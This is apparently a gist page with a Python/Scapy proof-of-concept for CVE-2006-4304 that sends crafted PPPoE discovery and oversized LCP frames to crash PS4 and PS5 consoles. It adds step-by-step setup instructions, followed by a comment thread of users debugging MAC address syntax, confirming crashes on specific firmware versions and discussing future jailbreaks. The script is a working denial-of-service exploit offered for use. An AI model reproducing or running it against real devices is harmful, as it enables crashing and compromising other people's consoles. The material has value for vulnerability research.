PoC of CVE-2006-4304 for PS4/PS5

PS4-PS5-CVE-2006-4304.py

from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump

source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4
interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux

packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)

packet = sniff(iface=interface, filter="pppoed", count=1)
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)

packet = sniff(iface=interface, filter="pppoes", count=1)
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface)
print(hexdump(packet))

payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256 # this number might be different, just a guess
for i in range(20):
    sendp(payload, iface=interface)

Requires Python 3 and Scapy.

1. Connect your PS4/PS5 directly to PC via LAN cable.
2. Set up your PS4/PS5 for manual ethernet connection via PPPoE - insert any username/password.
3. Use "Test Internet Connection" on console.
4. Launch script.

If it worked, it will crash your console.

Should work on PS4 11.00 and lower, PS5 8.20 and lower.

This is supposedly what theflow0 reported on HackerOne.

Hello.
I get the following error.
What am I doing wrong?

Python 3.12.1 (tags/v3.12.1:2305ca5, Dec 7 2023, 22:03:25) [MSC v.1937 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license()" for more information.

Warning (from warnings module):
File "C:\ps5\PS4-PS5-CVE-2006-4304.py", line 3
source = b"\d8\5e\d3\78\cf\24" # MAC address of your adapter on PC
SyntaxWarning: invalid escape sequence '\d'

Warning (from warnings module):
File "C:\ps5\PS4-PS5-CVE-2006-4304.py", line 4
destination = b"\5c\84\3c\ca\fc\92" # MAC address of LAN on your PS4
SyntaxWarning: invalid escape sequence '\8'

Thank you

you spelled mac wrong, you have to put x first, example x5c

Thank you

C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:3: Syntactic warning: invalid escape sequence '\D'
source = b"\D8\BB\C1\B5\C9\96" # MAC address of your PC adapter
C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:4: Syntactic warning: invalid escape sequence '\9'
destination = b"\bc\60\a7\1a\96\c2" # The MAC address of the local network on your PS4
Backtracking (last call):
File "C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py ", line 7, in
package = sniff(iface=interface, filter="pppoed", count=1)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", line 1311, in the sniff
sniffer._run(*args, **kwargs)
file "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", line 1171, in

---

How to fix it?

C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:3: Syntactic warning: invalid escape sequence '\D' source = b"\D8\BB\C1\B5\C9\96" # MAC address of your PC adapter C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:4: Syntactic warning: invalid escape sequence '\9' destination = b"\bc\60\a7\1a\96\c2" # The MAC address of the local network on your PS4 Backtracking (last call): File "C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py ", line 7, in package = sniff(iface=interface, filter="pppoed", count=1) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", line 1311, in the sniff sniffer._run(*args, **kwargs) file "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", line 1171, in

How to fix it?

Read his solution above. You need the x infront of the characters.

C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:3: Синтаксическое предупреждение: недопустимая escape-последовательность '\D' source = b"\D8\BB\C1\B5\C9\96" # MAC-адрес адаптера ПК C:\Users\varlo\OneDrive\Working stol\PS4 11.00[PS4-PS5-CVE-2006-4304.py](https://github.com/advisories/GHSA-2p53-823g-x3xx):4: Синтаксическое предупреждение: недопустимая escape-последовательность '\9' destination = b"\bc\60\a7\1a\96\c2" # MAC-адрес локальной сети на PS4 Backtracking (последний вызов): Файл "C:\Users\varlo\OneDrive\Working stol\PS4 11.00[PS4-PS5-CVE-2006-4304](https://github.com/advisories/GHSA-2p53-823g-x3xx).py ", строка 7, в пакете = sniff(iface=interface, filter="pppoed", count=1) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Файл "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", строка 1311, в файле sniff sniffer._run(*args, **kwargs) "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", строка 1171, в
Как это исправить?

Прочтите его решение выше. Вам нужен x перед символами.

?

Wake up , x in front of the Mac characters

C:\Users\REY>"C:\Python30\PS4-PS5-CVE-2006-4304.py"
.
After it shuts down my PS5 on 6.02
What's next?
Sent 1 packets.
.
Sent 1 packets.
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets

bro its a poc meaning piece of concept no full jailbreak you have to wait!

cable needs straight or reverse?

cable needs straight or reverse?

PS4/5 can do Auto MDI-X, so it doesn't matter.

proof of concept.

Will 11.02 be available?

Will 11.02 be available?

no, this bug has been patched on 11.02

I've made a video showing how to set this up from scratch if anyone is interested.

https://www.youtube.com/watch?v=RbGOJGAD0xQ

If anyone is curious, working on PS5 7.61

零零零零

I tried it on PS3 and it freezes (sometime) on boot screen.

Received 2 packets, got 1 answers, remaining 0 packets

works only after setting up PPPoE for the first time or after changing username/password there. but yeah just tested with 11.00 and it does work

We have more info in Hacker One about this vuln, https://hackerone.com/reports/2177925 . Thanks to TheFl0w

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

Is it confirmed that it works on both 8.20 versions?

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

Ok I Will Wait _ I am not gonna Update my Console ever

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

Is it confirmed that it works on both 8.20 versions?

What You Mean "Works on both 8.20 versions ?" are you asking or telling us ?

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

Is it confirmed that it works on both 8.20 versions?

What You Mean "Works on both 8.20 versions ?" are you asking or telling us ?

I was asking @unaigonzalezz because there are two different 8.20 FW versions.

There is 8.20.00 and there is 8.20.02 like yours.
Unfortunately theflow only said 8.20 which could either mean both or only 8.20.00.

My Ps5 Software Version is 23.02-08 20.02.06-00.00.00.01 is that Still I'm able to jailbreak my Console or I miss the opportunity ?

You still on the scope for a future jailbreak, wait for a exploit and don't update your console.

Is it confirmed that it works on both 8.20 versions?

What You Mean "Works on both 8.20 versions ?" are you asking or telling us ?

I was asking @unaigonzalezz because there are two different 8.20 FW versions.

There is 8.20.00 and there is 8.20.02 like yours. Unfortunately theflow only said 8.20 which could either mean both or only 8.20.00.

Sorry that I didn't know more about jailbreaking stuff, in the past, I used 9.00 for my PS4 Slim version and after a long long time I got one more chance to use Jailbreak, and hopefully TheFlow says 8.20 which includes all the versions

I actually don't know but I if it is .02 it's a small change so I don't think is the error patch, but I'm not truly sure, so the best thing you can guys do is test this script, if it crashes your console, the future exploit should work too.